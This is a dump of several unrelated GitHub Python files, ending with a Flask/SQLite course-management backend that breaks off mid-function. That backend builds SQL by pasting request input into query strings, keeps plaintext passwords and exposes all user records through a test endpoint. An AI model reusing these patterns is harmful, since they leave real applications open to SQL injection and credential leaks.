Fix the code to play one match at 2:30 PM and the next match at 7:30 PM on each day\ndef fix_schedule(fixtures):\n for round_num, round_fixtures in enumerate(fixtures):\n day_counter = 0\n for i in range(0, len(round_fixtures), 2):\n first_match = round_fixtures[i]\n second_match = round_fixtures[i + 1]\n\n # Play the first match at 2:30 PM\n first_match_date = first_match[2] + timedelta(days=day_counter, hours=2, minutes=30)\n\n # Play the second match at 7:30 PM\n second_match_date = first_match[2] + timedelta(days=day_counter, hours=7, minutes=30)\n\n round_fixtures[i] = (first_match[0], first_match[1], first_match_date)\n round_fixtures[i + 1] = (second_match[0], second_match[1], second_match_date)\n\n day_counter += 1\n\n return fixtures\n\n# Example usage\nteam_names = ['Royal Challengers Bangalore' , 'Chennai Super Kings' , 'Kolkata Knight Riders' , 'Delhi Capitals' , 'Mumbai Indians' , 'Gujarat Titans' , 'Lucknow Super Giants','Punjab 
Kings','Rajasthan Royals','Sunrisers Hyderabad']\nstart_date = datetime(2023, 6, 20) #Specify the start date\nfixtures = schedule_matches(team_names, start_date)\n\n# Fix the Schedule\nfixtures = fix_schedule(fixtures)\n\n#Display the fixtures\nmatch_num = 0\nfor round_num, round_fixtures in enumerate(fixtures):\n print()\n print(f\"Round {round_num + 1} Fixtures:\")\n print()\n \n for match in round_fixtures:\n \n home, away , match_date = match\n \n print(f\"Match { match_num + 1}: -- Date : {match_date} -- {home} (Home) vs {away} (Away) \")\n match_num +=1\n \nmatch_num = 45\nfor round_num, round_fixtures in enumerate(fixtures):\n print()\n print(f\"Round {round_num + 10} Fixtures:\")\n print()\n \n for match in round_fixtures:\n \n away, home , match_date = match\n \n print(f\"Match { match_num + 1}: -- Date : {match_date} -- {home} (Home) vs {away} (Away) \")\n match_num +=1\n\nprint()\nprint (\"--- Knockout Stage ---\")\nprint()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"sohan2311/sohanmaity","sub_path":"Documents/Developer/Google_Coursera/Python for Beginers/Nested Loops/TeamAdvanced.py","file_name":"TeamAdvanced.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"29444436495","text":"#tls-server-hello\nimport os\nimport socket, sys, ssl\n\nSERVER_HOST = ''\nTLS_HELLOSERVER_PORT = 54221\nBACKLOG = 5\n\nservercontext = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)\n\nservercontext.load_cert_chain(certfile='/home/kai/local-ca/ca.crt',\n keyfile='/home/kai/local-ca/ca.key')\n\nprint('Server: PID', os.getpid())\nserv_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserv_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nserv_sock.bind((SERVER_HOST, TLS_HELLOSERVER_PORT))\n\nserv_sock.listen(BACKLOG)\nprint('Server waiting for a connection request ...')\n\nwhile True:\n cli_sock, cli_addr = serv_sock.accept()\n sslsock = servercontext.wrap_socket(cli_sock, server_side=True)\n try:\n print('Connected by', cli_addr)\n msg = sslsock.recv(1024) #receive greetings message\n print('Received:', msg.decode('utf-8'))\n if msg:\n welcome = 'Hi client, Welcome to Hello Server, Bye!!'\n welcome = welcome.encode('utf-8')\n sslsock.send(welcome)\n print('Sent welcome message to client', cli_addr[0])\n else:\n print('No data from', cli_addr[0])\n continue\n finally:\n sslsock.close()\n","repo_name":"khairul006/network-programming-skr3303","sub_path":"tls-server-hello.py","file_name":"tls-server-hello.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"29937911616","text":"from http import HTTPStatus\nimport requests\n\n\ndef test():\n test_result = 'Pass'\n\n\n\n # Reinitialize Restaurant service\n http_response = requests.post(\"http://localhost:8080/reInitialize\")\n\n if(http_response.status_code != HTTPStatus.CREATED):\n test_result = 'Fail 1'\n\n # Reinitialize Delivery service\n http_response = requests.post(\"http://localhost:8081/reInitialize\")\n\n if(http_response.status_code != HTTPStatus.CREATED):\n test_result = 'Fail 2'\n\n http_response = requests.post(\"http://localhost:8082/reInitialize\")\n\n if(http_response.status_code != HTTPStatus.CREATED):\n test_result = 'Fail 3'\n\n http_response = requests.get(\"http://localhost:8082/balance/301\")\n if (http_response.status_code != HTTPStatus.OK):\n test_result = 'Fail 4'\n\n res_body = http_response.json()\n cust_id = 
res_body.get(\"custId\")\n cust_balance = res_body.get(\"balance\")\n if (cust_id != 301):\n test_result = 'Fail 5'\n\n if(cust_balance != 2000.0):\n test_result = 'Fail 6'\n\n return test_result\n\n\nif __name__ == \"__main__\":\n test_result = test()\n print(test_result)\n","repo_name":"akash896/FoodDeliveryProject","sub_path":"Spring/Phase2 without DB Service/Tests/copy/Public5-Project1Phase1.py","file_name":"Public5-Project1Phase1.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"28562657006","text":"#!/usr/bin/python3\n\"\"\"create a class student and retrieve the dictionnary\"\"\"\n\n\nclass Student:\n \"\"\"creation of the class\"\"\"\n\n def __init__(self, first_name, last_name, age):\n \"\"\"instanciation of a student\"\"\"\n self.first_name = first_name\n self.last_name = last_name\n self.age = age\n\n def to_json(self, attrs=None):\n \"\"\"retrieves a dictionary representation of a Student instance\n Args:\n attrs (list): list of strings\n Return: a dictionnary\n \"\"\"\n if type(attrs) == list:\n check = 0\n for at in attrs:\n if type(at) != str:\n check = 1\n if check == 0:\n return {att: getattr(self, att)\n for att in attrs if hasattr(self, att)}\n return self.__dict__\n","repo_name":"solaure2tt/alx-higher_level_programming","sub_path":"0x0B-python-input_output/10-student.py","file_name":"10-student.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"41581199836","text":"\"\"\"A circular world environment.\"\"\"\nimport numpy\n\nfrom deep_learning.engine import base\n\nSTEP_LIMIT = 500\n\n\nclass CircularWorld(base.Environment):\n \"\"\"A circular world consists of integers between -n and n.\n\n Possible actions are go left (0), right (2), or stay (1). Going left from -n\n ends with n, and going right from n ends with -n. 
Any action getting closer\n to 0 is given +1 reward, with getting away given -1 reward and not moving\n with 0 reward.\n \"\"\"\n\n def __init__(self, size: int = 5):\n \"\"\"Constructor.\n\n Args:\n size: the integers between +/- size are used.\n \"\"\"\n super().__init__(state_shape=(1,), action_space_size=3)\n self._size = size\n\n self._current_state = None\n self._num_actions_taken = None\n self.Reset()\n\n def Reset(self) -> base.State:\n self._current_state = 0\n self._num_actions_taken = 0\n return numpy.array([[self._current_state]])\n\n def TakeAction(self, action: base.Action) -> base.Transition:\n current_state = self._current_state\n move = self.GetChoiceFromAction(action) - 1 # -1, 0, 1\n new_state = current_state + move\n\n r = None\n if move == 0:\n r = 0\n else:\n if move == 1 and current_state < 0:\n r = 1\n elif move == -1 and current_state > 0:\n r = 1\n else:\n r = -1\n\n if new_state > self._size:\n new_state = -self._size\n elif new_state < -self._size:\n new_state = self._size\n\n s = numpy.array([[current_state]])\n a = action\n if self._num_actions_taken >= STEP_LIMIT:\n sp = None\n else:\n sp = numpy.array([[new_state]])\n\n self._current_state = new_state\n self._num_actions_taken += 1\n\n return base.Transition(s, a, r, sp)\n\n def GetAllStates(self):\n return numpy.vstack(\n [numpy.array([s]) for s in range(-self._size, self._size + 1)])\n","repo_name":"ChihChiu29/deep_learning","sub_path":"examples/circular_world_env.py","file_name":"circular_world_env.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"2"} +{"seq_id":"1794886826","text":"import pandas as pd\nimport csv\n\n\nclass InputParser:\n\n @staticmethod\n def parse_input_zoo_data(filename, header='infer'):\n\n input_data = pd.read_csv(filename, header=header)\n\n classes = input_data[17].tolist()\n labels = input_data[0].tolist()\n\n del input_data[0]\n del input_data[17]\n\n input_database = {0: input_data.values}\n\n return input_database, labels, classes\n\n @staticmethod\n def output_list(data_list, filename):\n\n with open(filename, 'w') as f:\n wr = csv.writer(f, lineterminator='\\n')\n wr.writerow(data_list)\n","repo_name":"razmik/htgsom","sub_path":"util/input_parser.py","file_name":"input_parser.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"71427053485","text":"\"\"\"utils for the release process.\"\"\"\n\nimport sys\nimport subprocess\nfrom marian.version import __version__\n\ndef run(cmd):\n return subprocess.getoutput(cmd)\n\ndef update_version(version_file_path, version_str):\n \"\"\"update the version file.\"\"\"\n\n prefixed_warning = \"\"\"\\\"\\\"\\\"!!!AUTOMATICALLY GENERATED!!! DO NOT EDIT.\nsee marian/release.py.\\\"\\\"\\\"\\n\"\"\"\n\n version_doc = f'{prefixed_warning}__version__ = \"{version_str}\"\\n'\n\n with open(version_file_path, 'w') as f:\n f.write(version_doc)\n f.close()\n\ndef version_error():\n \"\"\"print that invalid semver was supplied and exit with error code 1.\"\"\"\n\n print('must supply version argument like \"0.0.10\".')\n print('exiting...')\n sys.exit(1)\n\ndef update_version_and_tag_for_release():\n \"\"\"\n full process. utilized by root release script.\n\n if master branch:\n 1. bump version\n 2. commit\n 3. tag\n 4. 
push both\n\n otherwise, just commit the bumped version.\n \"\"\"\n\n print(f'current version is {__version__}.')\n\n if len(sys.argv) > 1:\n new_version = sys.argv[1]\n else:\n try:\n new_version = input(\n '''what do you want the new version to be?\nenter new version: '''\n )\n except (KeyboardInterrupt, EOFError):\n print('\\nexiting...')\n sys.exit(0)\n\n if new_version == '' or new_version.count('.') != 2 or len(new_version) < 5:\n version_error()\n\n update_version(f'marian/version.py', new_version)\n\n print(f'version updated to {new_version}.')\n\n run('git add -A')\n run(f'git commit -m \"release v{new_version}\"')\n\n current_branch = run('git symbolic-ref --short HEAD')\n print(f'\\nOn {current_branch} branch...')\n if current_branch == 'master':\n # must use annotated tags if using --follow-tags\n run(f'git tag -a {new_version} -m \"v{new_version}\"')\n run('git push --follow-tags')\n print('tags and commits pushed.\\n')\n print(f'''after CI runs at https://travis-ci.org/nebulousdog/marian,\nfind new releases at all the following locations:\n* Github Releases: https://github.com/nebulousdog/marian/releases\n* PyPI: https://pypi.org/project/marian/\n* Github Pages: https://nebulousdog.github.io/marian/\n''')\n else:\n print('Quick releases are only performed on the master branch.')\n","repo_name":"dreamalligator/marian","sub_path":"marian/utils/release.py","file_name":"release.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"69902134446","text":"from glob import glob\nimport re\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport pylab as pl\n\nimport utilities\n\nif __name__ == '__main__':\n folders = glob(\"R*/\")\n\n print(folders)\n axis_list = []\n current_x_list = []\n current_y_list = []\n current_z_list = []\n Bx_coil_list = []\n By_coil_list = []\n Bz_coil_list = []\n B_coil_list = []\n Bx_list = []\n By_list = []\n Bz_list = []\n B_list = []\n Bx_std_list = []\n By_std_list = []\n Bz_std_list = []\n B_std_list = []\n for folder in folders:\n folder_split = re.split('R1|RQ1|_', folder)\n print(folder_split)\n # print(float(folder_split[4][:-1]))\n\n rotation_axis = folder_split[1]\n if rotation_axis == '':\n rotation_axis = 'z'\n\n current_x = float(folder_split[2])\n current_y = float(folder_split[3])\n current_z = float(folder_split[4][:-1])\n current = np.array([current_x, current_y, current_z])\n\n Bx_coil, By_coil, Bz_coil = utilities.amper2gauss_array(current_x, current_y, current_z)\n B_coil = np.linalg.norm([Bx_coil, By_coil, Bz_coil])\n\n\n print(rotation_axis, current)\n\n log_files = glob(f'{folder[:-1]}/*8.log')\n\n log_summary_files = glob(f'{folder[:-1]}/*summary.log')\n\n if len(log_files) == 1:\n log_file = log_files[0]\n print(log_file)\n log_summary_file = log_summary_files[0]\n\n B_dataframe = pd.read_csv(log_file, names=['Bx', 'By', 'Bz', 'B'], delimiter='\\t')\n # print(B_dataframe)\n\n Bx_mean = B_dataframe['Bx'].mean()\n By_mean = B_dataframe['By'].mean()\n Bz_mean = B_dataframe['Bz'].mean()\n B_mean = B_dataframe['B'].mean()\n\n\n\n Bx_std = np.std(B_dataframe['Bx']) / np.sqrt(len(B_dataframe['Bx']) - 1)\n By_std = np.std(B_dataframe['By']) / np.sqrt(len(B_dataframe['By']) - 1)\n Bz_std = np.std(B_dataframe['Bz']) / np.sqrt(len(B_dataframe['Bz']) - 1)\n B_std = np.std(B_dataframe['B']) / np.sqrt(len(B_dataframe['B']) - 1)\n\n print(f'B = {B_mean:.2f}, std = {B_std:.2f}, rB = {np.abs(B_std / B_mean) * 100:.2f} 
%')\n            print(f'Bx = {Bx_mean:.2f}, std = {Bx_std:.2f}, rBx = {np.abs(Bx_std / Bx_mean) * 100:.2f} %')\n            print(f'By = {By_mean:.2f}, std = {By_std:.2f}, rBy = {np.abs(By_std / By_mean) * 100:.2f} %')\n            print(f'Bz = {Bz_mean:.2f}, std = {Bz_std:.2f}, rBz = {np.abs(Bz_std / Bz_mean) * 100:.2f} %')\n\n            f = open(log_summary_file, 'r')\n            summary = f.read()\n            f.close()\n\n            print(summary)\n\n            if len(B_dataframe) > 5:\n                axis_list.append(rotation_axis)\n                current_x_list.append(current_x)\n                current_y_list.append(current_y)\n                current_z_list.append(current_z)\n                Bx_coil_list.append(Bx_coil)\n                By_coil_list.append(By_coil)\n                Bz_coil_list.append(Bz_coil)\n                B_coil_list.append(B_coil)\n                B_list.append(B_mean)\n                Bx_list.append(Bx_mean)\n                By_list.append(By_mean)\n                Bz_list.append(Bz_mean)\n                B_std_list.append(B_std)\n                Bx_std_list.append(Bx_std)\n                By_std_list.append(By_std)\n                Bz_std_list.append(Bz_std)\n\n    data = {'axis': axis_list,\n            'current_x': current_x_list,\n            'current_y': current_y_list,\n            'current_z': current_z_list,\n            'Bx_coil' : Bx_coil_list,\n            'By_coil': By_coil_list,\n            'Bz_coil': Bz_coil_list,\n            'B_coil': B_coil_list,\n            'Bx_measured': Bx_list,\n            'By_measured': By_list,\n            'Bz_measured': Bz_list,\n            'B_measured': B_list,\n            'Bx_measured_std': Bx_std_list,\n            'By_measured_std': By_std_list,\n            'Bz_measured_std': Bz_std_list,\n            'B_measured_std': B_std_list}\n\n    dataframe = pd.DataFrame(data)\n    # print(dataframe)\n\n    # rotate around x axis\n    print('rotate around x axis')\n    dataframe_x = dataframe[dataframe['axis'] == 'x']\n    # print(dataframe_x)\n\n    fig1 = plt.figure('x-axis')\n    # plt.scatter(dataframe_x['current_y'], dataframe_x['current_z'])\n\n    plt.title('Rotate around x axis')\n    plt.scatter(dataframe_x['By_measured'], dataframe_x['Bz_measured'], label='measured')\n    plt.scatter(dataframe_x['By_coil'], dataframe_x['Bz_coil'], label='coil')\n    plt.xlabel('By, G')\n    plt.ylabel('Bz, G')\n    plt.axis('equal')\n    plt.legend()\n\n    # rotate around y axis\n    print('rotate around y axis')\n    dataframe_y = dataframe[dataframe['axis'] == 'y']\n    # print(dataframe_x)\n\n    plt.figure('y-axis')\n    # plt.scatter(dataframe_x['current_y'], dataframe_x['current_z'])\n    plt.title('Rotate around y axis')\n    plt.scatter(dataframe_y['Bx_measured'], dataframe_y['Bz_measured'], label='measured')\n    plt.scatter(dataframe_y['Bx_coil'], dataframe_y['Bz_coil'], label='coil')\n    plt.xlabel('Bx, G')\n    plt.ylabel('Bz, G')\n    plt.axis('equal')\n    plt.legend()\n\n    # rotate around z axis\n    print('rotate around z axis')\n    dataframe_x = dataframe[dataframe['axis'] == 'z']\n    # print(dataframe_x)\n\n    plt.figure('z-axis')\n    # plt.scatter(dataframe_x['current_y'], dataframe_x['current_z'])\n    plt.title('Rotate around z axis')\n    plt.scatter(dataframe_x['Bx_measured'], dataframe_x['By_measured'], label='measured')\n    plt.scatter(dataframe_x['Bx_coil'], dataframe_x['By_coil'], label='coil')\n    plt.xlabel('Bx, G')\n    plt.ylabel('By, G')\n    plt.axis('equal')\n    plt.legend()\n\n    # plt.figure()\n    # plt.plot(dataframe_x['B_measured'], label='measured')\n    # plt.plot(dataframe_x['B_coil'], label='coil')\n    # plt.legend()\n    plt.show()\n\n","repo_name":"laimabusaite/magnetometer_raspi","sub_path":"plot_measured_magnetic_field_rotation.py","file_name":"plot_measured_magnetic_field_rotation.py","file_ext":"py","file_size_in_byte":5844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"3641617381","text":"from flask import Flask, request, jsonify\nfrom flask_cors import CORS, cross_origin\nimport sqlite3, json, time\nfrom datetime 
import datetime\n\napp = Flask(__name__)\ncors = CORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\n\nconnect = sqlite3.connect('sqlite/canvas.db', check_same_thread=False)\ncursor = connect.cursor()\n\n@app.route('/test')\ndef my_profile():\n    users = cursor.execute(\"SELECT * FROM users;\").fetchall()\n    announcements = cursor.execute(\"SELECT * FROM announcements;\").fetchall()\n    enrollments = cursor.execute(\"SELECT * FROM enrollments;\").fetchall()\n    courses = cursor.execute(\"SELECT * FROM courses;\").fetchall()\n    assignments = cursor.execute(\"SELECT * FROM assignments;\").fetchall()\n    student_assignment = cursor.execute(\"SELECT * FROM student_assignment;\").fetchall()\n    response_body = {\n        \"users\": users,\n        \"announcements\": announcements,\n        \"enrollments\": enrollments,\n        \"courses\": courses,\n        \"assignments\": assignments,\n        \"student_assignment\": student_assignment\n    }\n    return json.dumps(response_body)\n\n@app.route('/s_assignments')\ndef s_assignments():\n    con = connect\n    con.row_factory = dict_factory\n    cur = con.cursor()\n    assignments = cur.execute(\"SELECT assignments.assignment_id, description, due_date, answer FROM assignments left join student_assignment on student_assignment.assignment_id = assignments.assignment_id\").fetchall()\n    return jsonify(assignments)\n\n@app.route('/t_assignments')\ndef t_assignments():\n    con = connect\n    con.row_factory = dict_factory\n    cur = con.cursor()\n    assignments = cur.execute(\"SELECT assignment_id, description, points, due_date from assignments\").fetchall()\n    return jsonify(assignments)\n\n@app.route('/s_ann')\ndef s_ann():\n    ann = cursor.execute(\"SELECT * from announcements\").fetchall()\n    response_body = {\n        \"data\":ann\n    }\n    return json.dumps(response_body)\n\n\ndef dict_factory(cursor, row):\n    d = {}\n    for idx, col in enumerate(cursor.description):\n        d[col[0]] = row[idx]\n    return d\n\n@app.route('/t_ann')\ndef t_ann():\n    con = connect\n    con.row_factory = dict_factory\n    cur = con.cursor()\n    ann = cur.execute(\"SELECT * from announcements\").fetchall()\n\n    return jsonify(ann)\n\n\n@app.route('/s_grade')\ndef s_grade():\n    ann = cursor.execute(\"SELECT assignments.assignment_id, description, points, grade from student_assignment natural join assignments\").fetchall()\n    response_body = {\n        \"data\":ann\n    }\n    return json.dumps(response_body)\n\n@app.route('/t_grade')\ndef t_grade():\n    con = connect\n    con.row_factory = dict_factory\n    cur = con.cursor()\n    ann = cur.execute(\"SELECT s_assignment_id, answer, user_id, assignments.assignment_id, description, points, grade from student_assignment natural join assignments\").fetchall()\n    \n    return jsonify(ann)\n\n\n@app.route('/users')\ndef get_users():\n    users = cursor.execute(\"SELECT * FROM users;\").fetchall()\n    return json.dumps({\"users\": users})\n\n@app.route('/users_courses')\ndef get_users_courses():\n    users = cursor.execute(\"SELECT * FROM users WHERE role != 'admin';\").fetchall()\n    courses = cursor.execute(\"SELECT * FROM courses;\").fetchall()\n    response_body = {\n        \"users\": users,\n        \"courses\": courses\n    }\n    return json.dumps(response_body)\n\n@app.route('/users/<user_id>')\ndef get_user(user_id):\n    user = cursor.execute(\"SELECT * FROM users WHERE user_id = {0};\".format(user_id)).fetchall()[0]\n    response_body = {\n        \"user\": user\n    }\n    return json.dumps(response_body)\n\n@app.route('/edit_profile/<user_id>', methods=['POST'])\ndef edit_profile(user_id):\n    req = json.loads(request.data)\n    newName = req['new_name']\n    newEmail = req['new_email']\n    newS1 = req['new_s1']\n    newS2 = req['new_s2']\n    newS3 = req['new_s3']\n    msg = 
\"\"\n\n    if newName != None and newName != \"\":\n        cursor.execute(\"UPDATE users SET full_name = '{0}' WHERE user_id = {1};\".format(newName, user_id))\n        connect.commit()\n        msg = \"Your name is now \" + newName + \"\\n\"\n    if newEmail != None and newEmail != \"\":\n        cursor.execute(\"UPDATE users SET email = '{0}' WHERE user_id = {1};\".format(newEmail, user_id))\n        connect.commit()\n        msg += \"Your email is now \" + newEmail + \"\\n\"\n    if newS1 != None and newS1 != \"\":\n        cursor.execute(\"UPDATE users SET security_question_1 = '{0}' WHERE user_id = {1};\".format(newS1, user_id))\n        connect.commit()\n        msg += \"Your answer for the question \\\"What is your favorite movie?\\\" is now \\\"\" + newS1 + \"\\\"\\n\"\n    if newS2 != None and newS2 != \"\":\n        cursor.execute(\"UPDATE users SET security_question_2 = '{0}' WHERE user_id = {1};\".format(newS2, user_id))\n        connect.commit()\n        msg += \"Your answer for the question \\\"What is your father's middle name?\\\" is now \\\"\" + newS2 + \"\\\"\\n\"\n    if newS3 != None and newS3 != \"\":\n        cursor.execute(\"UPDATE users SET security_question_3 = '{0}' WHERE user_id = {1};\".format(newS3, user_id))\n        connect.commit()\n        msg += \"Your answer for the question \\\"What is the make of your first car?\\\" is now \\\"\" + newS3 + \"\\\"\\n\"\n\n    if not ((newName != None and newName != \"\") or (newEmail != None and newEmail != \"\") or (newS1 != None and newS1 != \"\") or (newS2 != None and newS2 != \"\") or (newS3 != None and newS3 != \"\")):\n        msg = \"Please enter at least an input\"\n\n    response_body = {\n        \"message\": msg\n    }\n    return json.dumps(response_body)\n\n@app.route('/edit_user_info_admin/<user_email>', methods=['POST'])\ndef edit_user_info_admin(user_email):\n    req = json.loads(request.data)\n    newName = req['new_name']\n    newEmail = req['new_email']\n    newS1 = req['new_s1']\n    newS2 = req['new_s2']\n    newS3 = req['new_s3']\n    msg = \"\"\n\n    if newName != None and newName != \"\":\n        cursor.execute(\"UPDATE users SET full_name = '{0}' WHERE email = '{1}';\".format(newName, user_email))\n        connect.commit()\n        msg = \"Your name is now \" + newName + \"\\n\"\n    if newEmail != None and newEmail != \"\":\n        cursor.execute(\"UPDATE users SET email = '{0}' WHERE email = '{1}';\".format(newEmail, user_email))\n        connect.commit()\n        msg += \"Your email is now \" + newEmail + \"\\n\"\n    if newS1 != None and newS1 != \"\":\n        cursor.execute(\"UPDATE users SET security_question_1 = '{0}' WHERE email = '{1}';\".format(newS1, user_email))\n        connect.commit()\n        msg += \"Your answer for the question \\\"What is your favorite movie?\\\" is now \\\"\" + newS1 + \"\\\"\\n\"\n    if newS2 != None and newS2 != \"\":\n        cursor.execute(\"UPDATE users SET security_question_2 = '{0}' WHERE email = '{1}';\".format(newS2, user_email))\n        connect.commit()\n        msg += \"Your answer for the question \\\"What is your father's middle name?\\\" is now \\\"\" + newS2 + \"\\\"\\n\"\n    if newS3 != None and newS3 != \"\":\n        cursor.execute(\"UPDATE users SET security_question_3 = '{0}' WHERE email = '{1}';\".format(newS3, user_email))\n        connect.commit()\n        msg += \"Your answer for the question \\\"What is the make of your first car?\\\" is now \\\"\" + newS3 + \"\\\"\\n\"\n\n    if not ((newName != None and newName != \"\") or (newEmail != None and newEmail != \"\") or (newS1 != None and newS1 != \"\") or (newS2 != None and newS2 != \"\") or (newS3 != None and newS3 != \"\")):\n        msg = \"Please enter at least an input\"\n\n    response_body = {\n        \"message\": msg\n    }\n    return 
json.dumps(response_body)\n\n@app.route('/add_course', methods=['POST'])\ndef add_course():\n    req = json.loads(request.data)\n    newName = req['new_course_name']\n    newCapacity = req['new_capacity']\n    newDescription = req['new_description']\n    msg = \"\"\n\n    courses = cursor.execute(\"SELECT * FROM courses;\").fetchall()\n    new_idx = len(courses) + 1\n\n    cursor.execute(\"INSERT INTO courses VALUES ({0}, '{1}', NULL, {2}, '{3}');\".format(new_idx, newName, newCapacity, newDescription))\n    connect.commit()\n    msg = \"Successfully added \" + newName + \" to the system\"\n\n    response_body = {\n        \"message\": msg\n    }\n    return json.dumps(response_body)\n\n@app.route('/settings', methods=['POST'])\ndef change_status():\n    req = json.loads(request.data)\n    newStatus = req['newStatus']\n    email = req['email']\n    cursor.execute(\"UPDATE users SET status = '{0}' WHERE email = '{1}';\".format(newStatus, email))\n    connect.commit()\n    return {}\n\n@app.route('/new_submission', methods=['GET','POST'])\ndef new_submission():\n    req = json.loads(request.data)\n    assignment_id = req['assignment_id']\n    description = req['description']\n    due_date = req['due_date']\n    user_id = req['user_id']\n    answer = req['answer']\n    cursor.execute(f\"UPDATE student_assignment SET answer = '{answer}' where assignment_id = {assignment_id} and user_id = {user_id};\")\n    connect.commit()\n    return {}\n\n\n@app.route('/new_grade', methods=['GET','POST'])\ndef new_grade():\n    req = json.loads(request.data)\n    # assignment_id = req['assignment_id']\n    s_assignment_id = req['s_assignment_id']\n    # student_id = req['user_id']\n    grade = req['grade']\n    cursor.execute(f\"UPDATE student_assignment SET grade = '{grade}' where s_assignment_id = {s_assignment_id};\")\n    connect.commit()\n    return {}\n\n@app.route('/new_ann', methods=['POST'])\ndef new_ann():\n    req = json.loads(request.data)\n    now = datetime.now() # current date and time\n    date_time = now.strftime(\"%m/%d/%Y\")\n    content = req['content']\n    cursor.execute(f\"INSERT INTO announcements (course_id, posted_date, content) Values (1, '{date_time}', '{content}');\")\n    connect.commit()\n    return {}\n\n@app.route('/new_ass', methods=['POST'])\ndef new_ass():\n    req = json.loads(request.data)\n    description = req['description']\n    due = req['due']\n    points = req['points']\n    cursor.execute(f\"INSERT INTO assignments (course_id, due_date, points, description) Values (1, '{due}', {points}, '{description}');\")\n    connect.commit()\n    return {}\n\n@app.route('/<user_id>')\ndef dashboard(user_id):\n    if user_id == \"favicon.ico\":\n        return {}\n\n    activeStudents = cursor.execute(\"SELECT * FROM users WHERE status = 'active' AND role = 'student';\").fetchall()\n    activeTeachers = cursor.execute(\"SELECT * FROM users WHERE status = 'active' AND role = 'teacher';\").fetchall()\n    courses = cursor.execute(\"SELECT * FROM courses;\").fetchall()\n\n    currTimeSeconds = int(time.time())\n\n    teacher_assignments = cursor.execute(\"SELECT * FROM assignments JOIN courses USING(course_id) \\\n                                            WHERE instructor_id = \" + user_id + \";\").fetchall()\n    to_be_graded = []\n    for a in teacher_assignments:\n        dueDate = a[2].split(\"/\")\n        dueDateSeconds = datetime(int(dueDate[2]), int(dueDate[0]), int(dueDate[1]), 23, 59).timestamp()\n        if (currTimeSeconds - dueDateSeconds >= 0):\n            to_be_graded.append(a)\n\n    student_assignments = cursor.execute(\"SELECT * FROM assignments \\\n                                            JOIN student_assignment USING(assignment_id) \\\n                                            JOIN courses USING(course_id) \\\n                                            WHERE user_id = \" + user_id + \";\").fetchall()\n    todo = []\n    upcoming = []\n    past = []\n    for a 
in student_assignments:\n dueDate = a[2].split(\"/\")\n dueDateSeconds = datetime(int(dueDate[2]), int(dueDate[0]), int(dueDate[1]), 23, 59).timestamp()\n if (currTimeSeconds - dueDateSeconds >= 0):\n past.append(a)\n elif (dueDateSeconds - currTimeSeconds > 60*60*24*3):\n upcoming.append(a)\n else:\n todo.append(a)\n\n response_body = {\n \"numOfActiveStudents\": len(activeStudents),\n \"numOfActiveTeachers\": len(activeTeachers),\n \"numOfCourses\": len(courses),\n \"to_be_graded\": to_be_graded,\n \"todo\": todo,\n \"upcoming\": upcoming,\n \"past\": past\n }\n return json.dumps(response_body)\n\n\n@app.route('/login', methods=['GET','POST'])\ndef validate_login():\n req = json.loads(request.data)\n username = req['username']\n password = req['pwd']\n\n user = cursor.execute(\"SELECT * FROM users WHERE username = '{0}';\".format(username)).fetchall()[0]\n if user[5] == 'inactive':\n response_body = {\n \"inactive\": True\n }\n return json.dumps(response_body)\n\n sql = \"SELECT password from users WHERE username = '\"+username+\"';\"\n print(sql)\n if cursor.execute(sql).fetchone(): # if the user exists in the database\n matching_password = cursor.execute(sql).fetchone()[0]\n else: # make matching password 0 so that login always fails\n matching_password = 0\n print(matching_password)\n\n user = cursor.execute(\"SELECT user_id, role FROM users WHERE username = '{0}';\".format(username)).fetchall()[0]\n user_id = user[0]\n role = user[1]\n\n response_body = {\n \"success\": password == matching_password,\n \"user_id\": user_id,\n \"role\": role,\n \"inactive\": False\n }\n return json.dumps(response_body)\n\n@app.route('/signup', methods=['GET','POST'])\n@cross_origin()\ndef sign_up():\n req = json.loads(request.data)\n username, name, pwd, email, confirmPwd, sa1, sa2, sa3, role = req['username'], req['name'], req['pwd'], req['email'], req['confirmPwd'], req['sa1'], req['sa2'], req['sa3'], req['role']\n\n # assign the next number of student id\n user_id = cursor.execute('SELECT MAX(user_id) from users;').fetchone()[0] + 1\n print(user_id)\n\n # add the user to database\n cursor.execute(\"INSERT INTO users (user_id, username, password, full_name, email, status, role, security_question_1, security_question_2, security_question_3) VALUES (\"+str(user_id)+\", '\"+username+\"', '\"+pwd+\"', '\"+name+\"', '\"+email+\"', 'inactive', '\"+role+\"', '\"+sa1+\"', '\"+sa2+\"', '\"+sa3+\"');\")\n connect.commit()\n\n response_body = {\n 'success': True\n }\n return json.dumps(response_body)\n \n@app.route('/login/AnswerSq', methods=['GET','POST'])\ndef validate_sq():\n req = json.loads(request.data)\n username, sa1, sa2, sa3, pwd = req['username'], req['sa1'], req['sa2'], req['sa3'], req['pwd']\n\n # first check if user exists\n user_exists = False\n\n if cursor.execute(\"SELECT * from users where username = '\"+username+\"';\").fetchone():\n print('user exists')\n user_exists = True\n # validate security answers\n answer_match = False\n # print(cursor.execute(\"SELECT * from users where username = '\"+username+\"';\").fetchone())\n if (sa1, sa2, sa3) == cursor.execute(\"SELECT security_question_1, security_question_2, security_question_3 from users where username = '\"+username+\"';\").fetchone():\n 